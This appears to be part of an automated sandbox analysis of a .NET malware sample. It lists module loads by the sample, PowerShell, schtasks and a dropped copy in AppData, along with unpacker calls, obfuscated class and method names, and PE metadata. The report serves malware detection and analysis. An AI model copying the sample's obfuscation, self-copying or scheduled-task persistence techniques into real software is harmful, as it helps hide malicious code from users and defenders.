Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: UzYE.pdb source: file.exe, djqdPdQRO.exe.0.dr
Source:	Binary string: UzYE.pdbSHA256 source: file.exe, djqdPdQRO.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: file.exe, LoginForm.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: djqdPdQRO.exe.0.dr, LoginForm.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.file.exe.92a0000.4.raw.unpack, gABJl64gxsjm8OdgN8.cs	.Net Code: HiYXAj4FbE System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.46088a8.0.raw.unpack, gABJl64gxsjm8OdgN8.cs	.Net Code: HiYXAj4FbE System.Reflection.Assembly.Load(byte[])

Source: file.exe

Static PE information: 0xD9EFB718 [Mon Nov 12 01:10:48 2085 UTC]

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0783F5AF push E871AE0Dh; iretd	0_2_0783F5BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_078E8510 pushad ; ret	0_2_078E8511
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_078EAAD6 pushfd ; ret	0_2_078EAAD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00E224B9 push 8BFFFFFFh; retf	7_2_00E224BF
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06B3C2F1 push es; ret	9_2_06B3C300
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06B38071 push es; ret	9_2_06B38080
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06BE8510 pushad ; ret	9_2_06BE8511
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06BEAAD6 pushfd ; ret	9_2_06BEAAD7
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06BE723A push es; ret	9_2_06BE7210
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06BE7222 push es; ret	9_2_06BE7238
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06BE7212 push es; ret	9_2_06BE7220
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06BE7266 push es; ret	9_2_06BE726C
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06BE71E2 push es; ret	9_2_06BE7210
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_06BE71D7 push es; ret	9_2_06BE71E0
Source: C:\Users\user\AppData\Roaming\djqdPdQRO.exe	Code function: 9_2_081BAA08 push eax; iretd	9_2_081BAA09

Source: file.exe	Static PE information: section name: .text entropy: 7.690647824328755
Source: djqdPdQRO.exe.0.dr	Static PE information: section name: .text entropy: 7.690647824328755

Source: 0.2.file.exe.92a0000.4.raw.unpack, ulqHQPXdt9DNUacN9E.cs	High entropy of concatenated method names: 'nE5Vi9Q3O3', 'tUFV4qGC0o', 'LRyVK4RSdj', 'NplVRZnWi2', 'u4bVTbcD5x', 'kKkVFyxELW', 'gKIRvByT4f9ObeKccI', 't67RqJdXZdoIR02JWL', 'Sn6VVhpJsK', 'rvrV6JNK0o'
Source: 0.2.file.exe.92a0000.4.raw.unpack, hE4rwxI1U6QX496TGr.cs	High entropy of concatenated method names: 'tcZYTDwG2o', 'gEWYG8kpRB', 'L6vYYxQNGN', 'wKgY9Kn2MC', 'THuYdhIvUF', 'cGdYthqNJY', 'Dispose', 'smhMooAnoL', 'jS1MOgNxaM', 'cOrMw6G9sS'
Source: 0.2.file.exe.92a0000.4.raw.unpack, zV3njZwgPdlun34Skv.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'q6ZCJV8dXD', 'fc0CepYj5b', 'ggUCzPpW8j', 'mDi6QiYPD9', 'H3J6V0ok5Z', 'r2J6CbsjtH', 'fpY66kWTDr', 'zjRe1VU8B9rvPNTetWk'
Source: 0.2.file.exe.92a0000.4.raw.unpack, wW7gvElsFqqc9MN53c.cs	High entropy of concatenated method names: 'EmuGm4ObVF', 'XH4GeuyMNK', 'JUEMQcbL4A', 'k67MVHKNLX', 'pxaGxKTMSp', 'wQgGL4wLoE', 'mBeG5o5O9r', 'irFGWgg8ws', 'wOOG09ZkSI', 'YIyGyES5uM'
Source: 0.2.file.exe.92a0000.4.raw.unpack, FfRFuPyZh88PnQB5l9.cs	High entropy of concatenated method names: 'ToString', 'ribFx8pAj9', 'urXFDjgZ8O', 'dL1FpRYA14', 'V76FfWSm8r', 'alhFbYOu8G', 'e5JFBhQ4VI', 'WicFrAQG6F', 'KUnF2VB8Mv', 'LcIFuKaWM8'
Source: 0.2.file.exe.92a0000.4.raw.unpack, gABJl64gxsjm8OdgN8.cs	High entropy of concatenated method names: 'YmK6sjavH5', 'NVV6oYlqWl', 'Ddu6ODDbSV', 'A3n6wp8M8N', 'D0S63NFQ2G', 'bni6kAPinq', 'XJX6iJbCcd', 'JVk64lkrmx', 'njU6HyHRUV', 'YHh6KJw3UI'
Source: 0.2.file.exe.92a0000.4.raw.unpack, Ccsk8Bzjm4byXukBXY.cs	High entropy of concatenated method names: 'XEeUP7i0A4', 'HJkUvKfHlt', 'x4YUcl0rRp', 'L3GUgOqWuE', 'tcuUDEJoHl', 'kFwUf52HoL', 'yxiUbvhkRc', 'h6KUtwG6L6', 'olUU7mRLM4', 'OSrU1mbc2s'
Source: 0.2.file.exe.92a0000.4.raw.unpack, ydvvxMng9h8PSGgpkR.cs	High entropy of concatenated method names: 'IvAGKtNVP5', 'CtsGRL0g0w', 'ToString', 'oXqGo5e91V', 'L6nGOq4Qif', 'iXIGwMLcjp', 'tIoG31sarZ', 'Rm2GkwQVxW', 'GWsGiYBZH9', 'RtRG4GF9wK'
Source: 0.2.file.exe.92a0000.4.raw.unpack, c76vuSVX6gsliElYeCw.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kSr8YakajM', 'uVe8Usvje7', 'ECs89uxLK9', 'Uqi88CL304', 'CWG8d4b57a', 'kFK8SDTDbf', 'hYo8t7VplO'
Source: 0.2.file.exe.92a0000.4.raw.unpack, RWJAdZO605P7Pfy0v0.cs	High entropy of concatenated method names: 'Dispose', 'cQXVJ496TG', 'llWCDbTNol', 'bIZ3Or0xMq', 'LBNVeKjc4P', 'aseVznj8Tl', 'ProcessDialogKey', 'VZCCQywhar', 'Y6oCVPibi1', 'lTbCCtTFtQ'
Source: 0.2.file.exe.92a0000.4.raw.unpack, tLJ6REfsBF1vqsDoyy.cs	High entropy of concatenated method names: 'AExktFjU8W', 'Hork7QGvGt', 'qaMkAKTYAf', 'XvskqVP0Xw', 'z9HkPjsHRy', 'zU5kjsgKNw', 'EKLkceQ1D9', 'eTNkhVTEkZ', 'kcgJucABScjML2ZCIiC', 'r0W3gGAHW1JYv5fLjHO'
Source: 0.2.file.exe.92a0000.4.raw.unpack, Q62oGbu8DV9rX5wJwd.cs	High entropy of concatenated method names: 'Pjdi7tOphl', 'Usli1DDVQu', 'JXaiA9Eebc', 'wdoiqYsfVA', 'lwniZd5P3o', 'sNwiPjoJ74', 'xSCijRatka', 'BJkiv8crfX', 'dnficb9DRP', 'gjPihK6Lxb'
Source: 0.2.file.exe.92a0000.4.raw.unpack, coA3DmVVBh3UctpBAZG.cs	High entropy of concatenated method names: 'AWFUeZ5N7S', 'B0TUzPGJDH', 'sET9Q5fxQC', 'LVX9VcVMyZ', 'orx9CMwgH6', 'rCj96bLb8Q', 'NRc9XvmQIM', 'pYA9s77m7l', 'TLv9oZlvTX', 'Eol9OK3Ok0'
Source: 0.2.file.exe.92a0000.4.raw.unpack, cywharJe6oPibi1HTb.cs	High entropy of concatenated method names: 'IbUYgCPqbl', 'AVaYDxPutv', 'mkWYpeSfi9', 'rp5Yfq882l', 'fAlYbGZTL3', 'u58YBQNMh5', 'HZrYrjXUyy', 'jKLY2NcV3i', 'biyYuFWivw', 'MLXYERPcas'
Source: 0.2.file.exe.92a0000.4.raw.unpack, sHfKkN54chF6WiE6AV.cs	High entropy of concatenated method names: 'iibavwvfP8', 'MEracCPRMX', 'nmYagAauS5', 'wfjaDH9c1n', 'kHZafvqCGo', 'nOgab4SMv1', 'jwAarUJYoR', 'Yn8a2NELIw', 'UJpaE0wXmu', 'ukoaxoSaZi'
Source: 0.2.file.exe.92a0000.4.raw.unpack, uXSXE7We5t716HfqRh.cs	High entropy of concatenated method names: 's6wTEVbnib', 'zdpTLikBlu', 'MmoTW93vKN', 'D4fT0TXHdG', 'uJ4TDFo4k4', 'VlJTpSluni', 'yPCTfsBngw', 'OkpTbgK7qX', 'KKKTBYZWhR', 'ceVTrVyJ1o'
Source: 0.2.file.exe.92a0000.4.raw.unpack, K2MnvBrrgKX79LA4tT.cs	High entropy of concatenated method names: 'sClio613M3', 'M09iwFDByy', 'PmfikKdhnZ', 'vSXkef0Mym', 'FCqkzHXLL0', 'XpMiQC0DGy', 'ThWiVTFmOB', 'Yl0iC9ZoBq', 'iuJi62OIOu', 'mhViXwJVqX'
Source: 0.2.file.exe.92a0000.4.raw.unpack, ONOLBgBydLdq850M1Z.cs	High entropy of concatenated method names: 'BVAky117qV', 'w6KknZbhbZ', 'jIbkN3VUYF', 'ToString', 'rCrklH2F8U', 'aSvkIP7j72', 'mvF0tXAT6CGtdhoFvcm', 'bTsJhmAWlIfbdquiOHo', 'vcLT0gAVkWebfu8RTDH'
Source: 0.2.file.exe.92a0000.4.raw.unpack, puUTeqC8kQWsB490u6.cs	High entropy of concatenated method names: 'tyWALv4NJ', 'vKuqqcH8i', 'H0pP0CIWY', 'WC1jYWeqB', 'FyAcFMa8D', 'tfqhnMn9T', 'LetgGc3WX2BMXek9Aj', 'SQCOLCkeOyUdiJv4IW', 'gwIMdhml6', 'IjhU5MH14'
Source: 0.2.file.exe.92a0000.4.raw.unpack, wTFtQOefwxCNemYGj4.cs	High entropy of concatenated method names: 'TlfUw8srGt', 'SxRU3N0kDb', 'GqgUkxvExF', 'CTDUihixgu', 'HhcUYgWw93', 'dmcU4M069U', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.file.exe.92a0000.4.raw.unpack, keQPg2cRy4RSdjuplZ.cs	High entropy of concatenated method names: 'c4fwq2uVBB', 'kOlwPPiypE', 'sm4wvgETFW', 'Ys6wcTMTIG', 'CmiwTrJY6e', 'whuwF2vcZS', 'RaPwGCWWSM', 'EfdwMjMdvY', 'JnRwYHf4Kp', 'KjtwUqoATP'
Source: 0.2.file.exe.92a0000.4.raw.unpack, p9L4P9VQd2EFVir3ApF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DjwUxcqGAi', 'nbAULwjC5S', 'RLiU5BJCL9', 'kUrUWp1jTY', 'Y7XU0bQaog', 'GhHUy5wihC', 'BiQUnYlQJP'
Source: 0.2.file.exe.92a0000.4.raw.unpack, TWi20shrpy2ST84bbc.cs	High entropy of concatenated method names: 'Njx3ZGyldT', 'o8E3jaslAm', 'BMvwpVZyeC', 'umswfik1qY', 'dChwbCWsi5', 'MPZwBX72NQ', 'S3ZwrDKdcE', 'zGtw2kXOho', 'ID0wuQpv7K', 'wW0wEVbW3p'
Source: 0.2.file.exe.92a0000.4.raw.unpack, Q9Q3O3v9UFqGC0o5Zy.cs	High entropy of concatenated method names: 'GebOWTqSXT', 'mDCO0H66tp', 'L9HOyIb0Cl', 'ey5OnGOJNW', 'ovEONYKgsF', 'RHsOlJAdBP', 'E2VOIp8cMS', 'uKHOmyNvT3', 'tmjOJ4DTv3', 'F8XOeAoBeV'
Source: 0.2.file.exe.92a0000.4.raw.unpack, H5x4KkgyxELWQJgB7k.cs	High entropy of concatenated method names: 'SBBksrm21H', 'KpDkOM2lUI', 'caDk3WDYOW', 'BcXki0J6Op', 'Plyk4K6wFh', 'CWm3NDDOCe', 'mvy3lEV2rY', 'O1a3IwSE39', 'TO53mLBQdb', 'EQq3Ji1iQy'
Source: 0.2.file.exe.92a0000.4.raw.unpack, SrUj34VC106CvAQ5XE8.cs	High entropy of concatenated method names: 'ToString', 'AIp9vBxRBp', 'Wa39cj2RL2', 'C8X9hXV1Wx', 'YK69gPn27k', 'ud09DwLZpl', 'f0N9pOGu3v', 'S2q9f7HZ9Z', 'M0InVKOyNtow6ZnY6Ul', 'jqJE6cOdpqUJh1W4HpM'
Source: 0.2.file.exe.46088a8.0.raw.unpack, ulqHQPXdt9DNUacN9E.cs	High entropy of concatenated method names: 'nE5Vi9Q3O3', 'tUFV4qGC0o', 'LRyVK4RSdj', 'NplVRZnWi2', 'u4bVTbcD5x', 'kKkVFyxELW', 'gKIRvByT4f9ObeKccI', 't67RqJdXZdoIR02JWL', 'Sn6VVhpJsK', 'rvrV6JNK0o'
Source: 0.2.file.exe.46088a8.0.raw.unpack, hE4rwxI1U6QX496TGr.cs	High entropy of concatenated method names: 'tcZYTDwG2o', 'gEWYG8kpRB', 'L6vYYxQNGN', 'wKgY9Kn2MC', 'THuYdhIvUF', 'cGdYthqNJY', 'Dispose', 'smhMooAnoL', 'jS1MOgNxaM', 'cOrMw6G9sS'
Source: 0.2.file.exe.46088a8.0.raw.unpack, zV3njZwgPdlun34Skv.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'q6ZCJV8dXD', 'fc0CepYj5b', 'ggUCzPpW8j', 'mDi6QiYPD9', 'H3J6V0ok5Z', 'r2J6CbsjtH', 'fpY66kWTDr', 'zjRe1VU8B9rvPNTetWk'
Source: 0.2.file.exe.46088a8.0.raw.unpack, wW7gvElsFqqc9MN53c.cs	High entropy of concatenated method names: 'EmuGm4ObVF', 'XH4GeuyMNK', 'JUEMQcbL4A', 'k67MVHKNLX', 'pxaGxKTMSp', 'wQgGL4wLoE', 'mBeG5o5O9r', 'irFGWgg8ws', 'wOOG09ZkSI', 'YIyGyES5uM'
Source: 0.2.file.exe.46088a8.0.raw.unpack, FfRFuPyZh88PnQB5l9.cs	High entropy of concatenated method names: 'ToString', 'ribFx8pAj9', 'urXFDjgZ8O', 'dL1FpRYA14', 'V76FfWSm8r', 'alhFbYOu8G', 'e5JFBhQ4VI', 'WicFrAQG6F', 'KUnF2VB8Mv', 'LcIFuKaWM8'
Source: 0.2.file.exe.46088a8.0.raw.unpack, gABJl64gxsjm8OdgN8.cs	High entropy of concatenated method names: 'YmK6sjavH5', 'NVV6oYlqWl', 'Ddu6ODDbSV', 'A3n6wp8M8N', 'D0S63NFQ2G', 'bni6kAPinq', 'XJX6iJbCcd', 'JVk64lkrmx', 'njU6HyHRUV', 'YHh6KJw3UI'
Source: 0.2.file.exe.46088a8.0.raw.unpack, Ccsk8Bzjm4byXukBXY.cs	High entropy of concatenated method names: 'XEeUP7i0A4', 'HJkUvKfHlt', 'x4YUcl0rRp', 'L3GUgOqWuE', 'tcuUDEJoHl', 'kFwUf52HoL', 'yxiUbvhkRc', 'h6KUtwG6L6', 'olUU7mRLM4', 'OSrU1mbc2s'
Source: 0.2.file.exe.46088a8.0.raw.unpack, ydvvxMng9h8PSGgpkR.cs	High entropy of concatenated method names: 'IvAGKtNVP5', 'CtsGRL0g0w', 'ToString', 'oXqGo5e91V', 'L6nGOq4Qif', 'iXIGwMLcjp', 'tIoG31sarZ', 'Rm2GkwQVxW', 'GWsGiYBZH9', 'RtRG4GF9wK'
Source: 0.2.file.exe.46088a8.0.raw.unpack, c76vuSVX6gsliElYeCw.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kSr8YakajM', 'uVe8Usvje7', 'ECs89uxLK9', 'Uqi88CL304', 'CWG8d4b57a', 'kFK8SDTDbf', 'hYo8t7VplO'
